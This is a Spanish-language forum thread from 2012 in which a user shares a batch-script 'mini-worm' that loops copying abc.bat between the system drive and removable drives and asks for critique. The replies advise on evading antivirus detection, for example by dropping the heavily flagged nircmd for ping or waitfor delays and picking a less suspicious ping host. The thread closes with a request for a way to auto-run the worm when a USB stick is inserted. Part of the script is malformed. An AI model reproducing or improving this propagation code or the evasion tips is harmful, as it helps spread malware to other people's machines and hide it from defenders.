porfavor den una opinion

Iniciado por 0xDani, 23 Abril 2012, 20:02 PM

0 Miembros y 1 Visitante están viendo este tema.

0xDani

Bueno he estado intentando crear un mini-gusano (o mejor, practicando batch y pensamiento malicioso a la vez) :¬¬ , y aunque se que seguramente no valdra mucho pido su opinion para tratar de aprender algo.
Lo dejo:

@echo off
:acb
nircmd wait 150000
if exist %homedrive%"\abc.bat" (goto abc) else goto no
:abc
copy /Y %homedrive%"\abc.bat" "%~d0\" >Nul
nircmd wait 150000
goto acb
:No
if exist %%a in (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) (goto e) else goto acb
:e
if exist %%a:"\abc.bat" copy /Y %%a:"\abc.bat" %homedrive%
nircmd wait 150000
goto acb


por supuesto esto es solo la parte de la propagacion, y el usar nircmd, un apaño.
Saludos ;D
I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM

Stakewinner00

no se k es "nircmd" yo hice un gusano mas o menos igual pero con mas sentencias IF

Karcrack

Hay formas mejores de simular un sleep en Batch sin usar nircmd... nircmd es muy detectado por los AVs

$Edu$

Karcrack.. si usaria pings para simular un sleep, por ejemplo:   ping -n 10 localhost>nul

Es detectado por los avs?

Karcrack

El problema de nircmd es que es un ejecutable a parte que además está muy taggeado...

No sé nada sobre el análisis heurístico de Batch, pero no creo que un ping tenga nada de maligno... tal vez deberías poner otro host para que no sea tan sospechoso... Aún así la forma lógica y precisa de usar ping para simular un sleep es usando el parámetro w:
Código (bash) [Seleccionar]
ping 1.2.3.4 -n 1 -w %TIEMPO_EN_MILISEGUNDOS% >NUL

Para mi gusto la mejor forma de hacer una pausa es esta (Aunque creo que en W$XP no viene por defecto :¬¬):
Código (bash) [Seleccionar]
waitfor /T %TIEMPO_EN_SEGUNDOS% karcrack_ejemplo >NUL

$Edu$

No conocia esa primer forma de simular el sleep, casi todos usan ping -n %tiempo_en_segundos% localhost>nul , por los codigos que he visto desde hace tiempo, pero es todo a confiarse de que cada ping demorara 1 seg, por eso si se hace 10 pings demoraria supuestamente 10 segs, pero nunca estuve del todo seguro, ese que dejas si es preciso y esta bien, Gracias!

0xDani

¿Alguien me podria recomendar una forma de hacer que el programa se ejecute cuando se introduzca el pen?He probado con autorun.inf, pero no funciona xk al introducir el pen te sale la ventana preguntandote que quieres hacer(abrir una carpeta,reproducir todo,etc...)
Gracias por sus opiniones y por lo del ping. ;-)
I keep searching for something that I never seem to find, but maybe I won't, because I left it all behind!

I code for $$$
Hago trabajos en C/C++
Contactar por PM